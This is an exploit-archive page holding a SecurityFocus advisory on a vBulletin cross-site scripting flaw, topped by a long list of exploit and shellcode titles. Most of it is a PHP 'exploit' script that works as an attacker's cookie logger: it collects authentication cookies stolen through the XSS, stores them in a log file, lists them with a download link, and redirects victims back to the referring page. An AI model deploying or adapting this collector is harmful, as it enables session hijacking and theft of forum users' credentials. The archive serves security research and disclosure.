
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
108 lines
No EOL
3.9 KiB
PHP
108 lines
No EOL
3.9 KiB
PHP
source: https://www.securityfocus.com/bid/6226/info
|
|
|
|
vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.
|
|
|
|
As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.
|
|
|
|
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.
|
|
|
|
<?PHP
|
|
// vBulletin XSS Injection Vulnerability: Exploit
|
|
// ---
|
|
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
|
|
// Descrption: Fetching vBulletin's cookies and storing it into a
|
|
log file.
|
|
|
|
// Variables:
|
|
|
|
$LogFile = "Cookies.Log";
|
|
|
|
// Functions:
|
|
/*
|
|
If ($HTTP_GET_VARS['Action'] = "Log") {
|
|
$Header = "<!--";
|
|
$Footer = "--->";
|
|
}
|
|
Else {
|
|
|
|
$Header = "";
|
|
$Footer = "";
|
|
}
|
|
Print ($Header);
|
|
*/
|
|
Print ("<Title>vBulletin XSS Injection Vulnerability:
|
|
Exploit</Title>");
|
|
Print ("<Pre>");
|
|
Print ("<Center>");
|
|
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
|
|
Print ("Coded By: <B><A
|
|
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
|
|
/*
|
|
Print ($Footer);
|
|
*/
|
|
|
|
Switch ($HTTP_GET_VARS['Action']) {
|
|
Case "Log":
|
|
|
|
$Data = $HTTP_GET_VARS['Cookie'];
|
|
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
|
|
(DecHex (MD5 (NULL))))));
|
|
$Log = FOpen ($LogFile, "a+");
|
|
FWrite ($Log, Trim ($Data) . "\n");
|
|
FClose ($Log);
|
|
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
|
|
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
|
|
Break;
|
|
Case "List":
|
|
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
|
|
Print ("<Br><Br><B>There are No
|
|
Records</B></Center></Pre>");
|
|
Exit ();
|
|
}
|
|
Else {
|
|
Print ("</Center></Pre>");
|
|
$Records = Array_UniQue (File ($LogFile));
|
|
Print ("<Pre>");
|
|
Print ("<B>.:: Statics</B>\n");
|
|
Print ("\n");
|
|
Print ("o Logged Records : <B>" . Count
|
|
(File ($LogFile)) . "</B>\n");
|
|
Print ("o Listed Records : <B>" . Count
|
|
($Records) . " </B>[Not Counting Duplicates]\n");
|
|
Print ("\n");
|
|
|
|
Print ("<B>.:: Options</B>\n");
|
|
Print ("\n");
|
|
|
|
If (Count (File ($LogFile)) > 0) {
|
|
$Link['Download'] = "[<A Href=\"" .
|
|
$LogFile . "\">Download</A>]";
|
|
}
|
|
Else{
|
|
$Link['Download'] = "[No Records in Log]";
|
|
}
|
|
|
|
Print ("o Download Log : " . $Link
|
|
['Download'] . "\n");
|
|
Print ("o Clear Records : [<A Href=\"" .
|
|
$SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
|
|
Print ("\n");
|
|
Print ("<B>.:: Records</B>\n");
|
|
Print ("\n");
|
|
|
|
While (List ($Line[0], $Line[1]) = Each ($Records)) {
|
|
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
|
|
}
|
|
}
|
|
|
|
Print ("</Pre>");
|
|
Break;
|
|
Case "Delete":
|
|
@UnLink ($LogFile);
|
|
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
|
|
Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
|
|
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
|
|
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
|
|
Break;
|
|
}
|
|
?>
|